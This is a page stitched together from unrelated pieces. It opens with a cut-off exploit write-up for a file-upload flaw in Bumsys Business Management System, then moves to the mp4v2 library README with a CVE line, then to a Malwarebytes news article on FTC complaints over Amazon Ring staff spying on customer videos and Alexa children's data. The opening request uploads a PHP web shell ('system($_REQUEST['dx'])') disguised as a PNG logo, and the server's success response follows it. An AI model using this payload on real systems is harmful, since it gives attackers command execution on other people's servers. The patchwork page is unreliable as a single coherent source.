teststate  
------WebKitFormBoundarynO0QAD84ekUMuGaA  
Content-Disposition: form-data; name="shopPostalCode"

700056  
------WebKitFormBoundarynO0QAD84ekUMuGaA  
Content-Disposition: form-data; name="shopCountry"

testIND  
------WebKitFormBoundarynO0QAD84ekUMuGaA  
Content-Disposition: form-data; name="shopPhone"

895623122  
------WebKitFormBoundarynO0QAD84ekUMuGaA  
Content-Disposition: form-data; name="shopEmail"

test@gmail.com  
------WebKitFormBoundarynO0QAD84ekUMuGaA  
Content-Disposition: form-data; name="shopInvoiceFooter"

 ------WebKitFormBoundarynO0QAD84ekUMuGaA  
Content-Disposition: form-data; name="shopLogo"; filename="profile picture.php"  
Content-Type: image/png

<?php echo system($_REQUEST['dx']); ?>

====================================================================================  
Burpsuite-Response  
====================================================================================  
HTTP/1.1 200 OK  
Date: Thu, 19 Jan 2023 07:14:26 GMT  
Server: Apache/2.4.51 (Unix) OpenSSL/1.0.2k-fips  
X-Powered-By: PHP/7.0.33  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate  
Pragma: no-cache  
Connection: close  
Content-Type: text/html; charset=UTF-8  
Content-Length: 65

<div class='alert alert-success'>Shop successfully updated.</div>

====================================================================================

VIDEO-POC : https://youtu.be/nwxIoSlyllQ

Bumsys Business Management System 1.0.3-beta Shell Upload

mp4v2 v2.1.3 was discovered to contain a memory leak via MP4SdpAtom::Read() at atom_sdp.cpp

**MP4v2 - _A C/C++ library to create, modify and read MP4 files_**

 

This is the _new_ MP4v2 project, a fork of the abandoned MP4v2 library project now archived at Google Code.

The MP4v2 library provides an API to create and modify MP4 files as defined by ISO-IEC:14496-1:2001 MPEG-4 Systems. This file format is derived from Apple's QuickTime file format that has been used as a multimedia file format in a variety of platforms and applications. It is a very powerful and extensible format that can accommodate practically any type of media.

Please visit mp4v2.org for more information about this project and its goals.

**License**

MP4v2 is released under the terms of the Mozilla Public License (MPL) Version 1.1. Please refer to the COPYING file for the full license text.

**Download**

Release packages of the MP4v2 library sources are available in the _Releases_ area.

**Building**

The MP4v2 library and utilities can be built using the following build systems:

*   **GNU Autotools**
    
    1.  Run autoreconf -i in the MP4v2 project base folder (only necessary when building directly from repository sources)
    2.  Run ./configure && make in the MP4v2 project base folder
*   **CMake**
    
    *   Run cmake . && make in the MP4v2 project base folder
*   **Visual Studio**
    
    *   Use the Visual Studio solution at vstudio/mp4v2.sln
*   **Xcode**
    
    *   Use the Xcode project at xcode/mp4v2.xcodeproj

MP4v2 has no special dependencies other than a working C++ compiler and build environment.

**Support**

Please use the _Issues_ area to report bugs and other issues or make feature requests. For questions and general discussion, please use the _Discussions_ area.

If you need to contact the maintainer, please send an email to support@mp4v2.org.

CVE-2023-33719: GitHub - enzo1982/mp4v2: Reviving the MP4v2 project...

Categories: News
Categories: Personal
It's what we all feared, but hoped wouldn't be the case.



(Read more...)




The post Amazon's Ring cameras were used to spy on customers appeared first on Malwarebytes Labs.

Every single Amazon Ring employee was able to access every single customer video, even when it wasn't necessary for their jobs. 

Not only that, but the employees—along with workers from a third-party contractor in Ukraine—could also download any of those videos and then save and share them as they liked, before July 2017.

That's what the FTC has alleged in a recent complaint, for which Amazon is facing a settlement of $5.8 million.

And, unsurprisingly, some employees abused that access right. 

In one example, the FTC says a Ring employee viewed thousands of videos from at least 81 different female users. The employee allegedly went looking for camera feeds that suggested they may have been used in the most private of areas, such as "Master Bedroom," "Master Bathroom," and "Spy cam". 

Between June and August 2017, the employee looked through the videos for at least an hour a day on hundreds of occasions. Another employee noticed and reported it to their supervisor who allegedly told them that it was "normal" for an engineer to view so many accounts.

From the FTC complaint:

> "Only after the supervisor noticed that the male employee was only viewing videos of “pretty girls” did the supervisor escalate the report of misconduct. Only at that point did Ring review a portion of the employee’s activity and, ultimately, terminate his employment."

As a result of that incident, Ring narrowed its employees' access rights in September 2017, so that customers had to consent to customer service agents accessing their videos. However, Ring continued to allow hundreds of other employees and third-party contractors access to all video data, regardless of whether they actually needed it in order to perform their jobs.

So, then, more abuse of that access occurred. In January 2018, a male employee used his access rights to spy on a female colleague's videos, looking her up using her email address.

In February 2018, employee access rights were narrowed further, with engineers (both employees and third-party contractors) only given access to customer videos if there was a business need. Videos used for research and development were limited to those posted by customers to Ring’s Neighbors app, and those for which employees, contractors, and their friends and family had given their written consent for such use.

In Februrary 2019, Ring changed its access practices again so that most Ring employees or contractors could only access a customer’s private video with that customer’s consent.

The FTC lists several further examples of access abuse and spying. According to the complaint, Ring actually has no idea how much inappropriate access went on, because there were no detection measures in place:

> "Importantly, because Ring failed to implement basic measures to monitor and detect inappropriate access before February 2019, Ring has no idea how many instances of inappropriate access to customers’ sensitive video data actually occurred.”

Bad apples aside, before May 2018 Ring also wasn't conducting any employee training on privacy or data security, despite the fact that the company was collecting huge amounts of highly sensitive data. Nor did it advise employees or third-party contractors that customer video data was sensitive and should be treated as such.

Customers had no idea their video was able to be accessed by so many employees. The FTC says that before December 2017, Ring’s Terms of Service and Privacy Policy didn't say Ring employees and contractors would have the right to review all video recordings for product improvement and development:

> In the middle of lengthy terms dense with legalese, Ring merely described the company’s right to use recordings obtained in connection with Ring’s (then called Doorbot’s) cloud service for product improvement and development. 

The FTC says Ring also failed to implement basic security measures to protect users from threats such as credential stuffing and brute force attacks, despite warnings from employees and external security researchers, nor did it implement multi-factor authentication (MFA) until May 2019, long after many competitors had done so.

As a result of these bad practices, Ring suffered several security incidents. Between January 2019 and March 2020, the FTC alleges that more than 55,000 customers had their Ring devices compromised. In some instances cybercriminals used the two-way communication to terrorise Ring customers, like something from a horror movie:

*   Several women lying in bed heard hackers curse at them
*   Several children had racist slurs thrown at them
*   An elderly woman in an assisted living facility was sexually propositioned and physically threatened
*   A digital intruder told a woman through her camera that they had killed her mother, and then said: "Tonight you die"
*   A woman was told her location was being tracked and that her device would self-destruct at the end of a countdown. She disconnected the device before the countdown ended.

Aside from the fine, Ring has been ordered to delete any customer videos and data collected from an individual’s face—known as “face embeddings”—that Ring obtained before 2018. Ring must also delete any work products it derived from the videos.

**Children's privacy**

In a separate settlement announced the same day, Amazon agreed to pay $25 million for failing to protect children's privacy. 

The Department of Justice filed the complaint and proposed settlement on behalf of the FTC. The complaint alleged that Amazon kept Alexa voice and geolocation information associated with young users for years while preventing parents from using their rights to delete their kids’ data under the Children's Online Privacy Protection Act (COPPA) rule.

The FTC said in a post that kids’ speech patterns could have been especially valuable to Amazon since they differ from those of adults:

> "Children’s speech patterns are markedly different from adults, so Alexa’s voice recordings gave Amazon a valuable data set for training the Alexa algorithm and further Amazon’s commercial interest in developing new products."

Alongside the $25 million settlement, Amazon will be banned from using children's voice information and geolocation data for creating or improving a data product. It must also delete inactive child accounts on Alexa, and notify users about the government action against the company and of its retention and deletion practices.

Additionally, Amazon will have to implement a privacy program to govern its use of geolocation information.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Tag

#apple